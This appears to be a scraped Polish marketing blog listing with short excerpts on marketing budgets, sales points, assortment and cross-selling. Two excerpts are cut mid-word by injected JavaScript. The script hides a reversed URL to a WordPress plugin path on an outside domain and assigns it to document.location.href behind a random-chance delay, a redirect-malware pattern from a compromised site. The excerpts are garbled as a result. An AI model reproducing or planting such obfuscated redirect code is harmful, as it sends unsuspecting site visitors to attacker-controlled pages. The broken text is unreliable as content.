Ile wydawać na marketing?

Najlepiej jak najmniej. A przynajmniej tylko tyle, ile można wydać efektywnie. Powyżej pewnego poziomu wydatków stają się one nieefektywne. Dlatego lepiej kierować się tu zasadą minimum. Uwaga. [...]

Dział i promocja

Placówki, w tym także te interne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = [...]

Asortyment, zapas czy produkt?

Zacząć trzeba od magicznej formuły. Mając ofertę, można sterować sprzedażą. Ale posiadając asortyment, można zarządzać magiczną formułą. Czyli przejść od medycyny [...]

Cross-sell

Czyli sprzedaż produktu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = [...]